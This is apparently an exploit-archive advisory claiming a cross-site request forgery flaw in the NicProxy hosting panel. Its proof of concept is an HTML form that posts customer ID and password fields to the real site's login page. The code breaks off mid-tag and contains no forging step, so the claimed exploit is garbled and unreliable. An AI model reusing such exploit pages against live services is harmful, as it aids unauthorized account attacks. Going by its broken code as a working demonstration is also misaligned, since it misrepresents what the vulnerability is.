NicProxy Hosting Service - CSRF

2021.10.30

Xale (TR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: NicProxy Hosting Service - CSRF
# Date: 2021-29-10
# Exploit Author: Xale 
# Tested on: Windows 10

Site ; https://www.nicproxy.com/
CSRF Exploit ;

<html>
<body>

	<form action="https://www.nicproxy.com/panel/login.asp" method="post">
	<div class="error-msg">
			
	</div>
	<div class="form-row">
	<label>Bayi Kodu</label>
	<input type="text" name="CustomerID" class="textbox" />
	</div>
	<div class="form-row">
	<label>Şifre</label>
	<input type="password" name="password" class="textbox" />
	</div>
	<div class="form-row">
	<input type="submit" value="Giriş" class="submit" />
	</div>
	<input type="hidden" name="command" value="login" />
	<input typ
</body>
</html>

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

NicProxy Hosting Service - CSRF

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.